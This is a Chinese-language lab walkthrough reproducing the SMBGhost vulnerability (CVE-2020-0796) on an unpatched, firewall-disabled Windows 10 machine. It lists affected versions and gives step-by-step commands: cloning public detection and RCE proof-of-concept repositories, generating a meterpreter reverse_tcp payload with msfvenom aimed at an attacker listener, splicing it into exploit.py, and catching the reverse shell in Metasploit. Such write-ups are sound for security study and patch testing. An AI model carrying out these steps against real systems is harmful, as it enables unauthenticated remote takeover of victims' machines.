CVE-2020-0796“永恆之黑”漏洞復現
Microsoft Server Message Block 3.1.1(SMBv3)協議在處理某些請求的方式中存在程式碼執行漏洞。攻擊者可以精心構造資料包傳送到SMB伺服器,無需經過身份驗證,即可在目標伺服器上執行任意程式碼。攻擊者可通過部署一臺惡意SMB v3伺服器,並誘導使用者(客戶端)連線到該伺服器,一旦目標使用者連線,即可在計算機上執行攻擊者自定義的惡意程式碼。由於上述漏洞與WannaCry(2017年5月“永恆之藍”)漏洞較為相似,易被蠕蟲利用傳播惡意程式,可能會成為惡意軟體和攻擊者廣泛利用的漏洞
0x01 影響範圍
-
Windows 10 Version 1903 for 32-bit Systems
-
Windows 10 Version 1903 for ARM64-based Systems
-
Windows 10 Version 1903 for x64-based Systems
-
Windows 10 Version 1909 for 32-bit Systems
-
Windows 10 Version 1909 for ARM64-based Systems
-
Windows 10 Version 1909 for x64-based Systems
-
Windows Server, version 1903 (Server Core installation)
-
Windows Server, version 1909 (Server Core installation)
0x02 測試環境
靶機:cn_windows_10_consumer_editions_version_1903_x64 (關閉防火牆)
攻擊機:kali 2020.1
(PS:如果步驟沒錯卻不能攻擊成功,可以重啟Win10再嘗試)
0x03 漏洞復現
3.1 漏洞檢測
通過git 命令下載檢測漏洞的python指令碼
1 git clone https://github.com/ollypwn/SMBGhost.git
利用指令碼測試目標主機是否脆弱
3.2 漏洞利用
下載漏洞攻擊的指令碼
1 git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git
exploit.py原檔案不能直接用來攻擊,需要修改其中的USER_PAYLOAD部分
利用msfvenom生成payload
1 # lhost為kali的IP,lport為監聽埠 2 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.104 lport=4444 -b '\x00' -f python
為了防止操作失誤,將exploit.py原檔案檔案進行備份
用vim開啟exploit.py
將USER_PAYLOAD部分刪除,替換為我們之前用msfvenom生成的payload
替換之後,在最後追加一行 USER_PAYLOAD = buf ,儲存並退出
在另一個視窗開啟MSF開啟監聽
執行exploit.p指令碼對Win10進行攻擊
再返回檢視開啟了MSF的視窗,已經成功連線
在Win10上檢視埠,連線存在